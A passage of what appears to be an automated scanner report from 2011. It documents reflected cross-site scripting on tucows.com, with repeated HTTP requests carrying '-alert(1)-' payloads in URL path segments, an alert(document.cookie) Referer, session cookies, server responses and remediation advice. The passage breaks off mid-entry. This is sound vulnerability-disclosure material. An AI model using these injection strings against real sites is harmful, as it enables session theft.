GET /includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d3d"-alert(1)-"9fd657fe3af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b794b"-alert(1)-"c38b7601809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/x_core.jsb794b"-alert(1)-"c38b7601809 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80391"-alert(1)-"2da181f97ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e49a"-alert(1)-"bcc9c43802 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d536b"-alert(1)-"a064303b2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beba4"-alert(1)-"b69b27dceac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ff"-alert(1)-"ccf5c4f6b2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:50 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd99a"-alert(1)-"3c47dc9c7d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f648"-alert(1)-"92dc0f19f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe1d"-alert(1)-"607a37a5993 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e65b"-alert(1)-"157ede0dbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b311"-alert(1)-"4061c82776f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
